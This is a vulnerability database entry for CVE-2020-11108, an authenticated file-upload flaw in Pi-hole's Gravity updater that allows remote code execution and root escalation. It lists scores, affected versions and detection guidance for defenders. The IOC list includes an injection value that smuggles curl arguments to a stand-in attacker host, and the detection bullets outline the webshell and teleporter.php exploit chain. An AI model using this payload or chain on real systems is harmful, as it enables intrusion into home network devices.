cbcvebase.
CVE-2020-11108
published 2020-05-11

CVE-2020-11108: The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing…

PriorityP180high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
78.26%
99.5th percentile
The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh.

Affected

1 ranges
VendorProductVersion rangeFixed in
pi-holepi-hole<= 4.4

Detection & IOCsextracted from sources · hover to see the quote

url/admin/index.php
url/admin/settings.php?tab=blocklists
url/admin/scripts/pi-hole/php/gravity.sh.php
url/admin/scripts/pi-hole/php/fun.php
filenamefun.php
filenameteleporter.php
path/admin/scripts/pi-hole/php/teleporter.php
pathgravity.sh
commandnewuserlists=http://<ATTACKER>#" -o fun.php -d "
  • Detect POST requests to /admin/settings.php?tab=blocklists containing a 'newuserlists' parameter value with curl injection pattern: a URL fragment followed by -o <filename>.php -d to write arbitrary PHP files into the webroot.
  • Detect GET requests to /admin/scripts/pi-hole/php/gravity.sh.php from authenticated sessions, especially in rapid succession (multiple calls within seconds), as this is used to trigger the malicious blocklist download.
  • Alert on GET requests to /admin/scripts/pi-hole/php/fun.php or any random-named .php file under /admin/scripts/pi-hole/php/ that did not previously exist — this is the attacker triggering the dropped webshell.
  • Monitor for unexpected creation or modification of teleporter.php in the Pi-hole web admin directory, as the exploit overwrites it with a root-privilege payload.
  • The exploit requires the attacker-controlled HTTP server to listen on port 80 exactly; detect outbound connections from the Pi-hole host to attacker port 80 during a gravity update as an indicator of exploitation.
  • Look for the Pi-hole admin login followed immediately by blocklist modification (POST to settings.php?tab=blocklists) and then repeated gravity.sh.php calls — this three-phase sequence is the exploit chain.
  • ·Exploitation requires authentication to the Pi-hole admin interface; an attacker must have valid credentials (or the interface must be unauthenticated). The PASSWORD option may be blank if no password is set.
  • ·The attacker's HTTP server MUST be reachable by the Pi-hole host on port 80 specifically; exploitation fails if SRVPORT is not 80.
  • ·The root privilege escalation phase overwrites teleporter.php permanently, breaking that application feature; cleanup of added blocklist entries must be performed manually.
  • ·The exploit may require two consecutive gravity update requests to advance through its stages; a single gravity pull may not be sufficient to trigger payload delivery.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.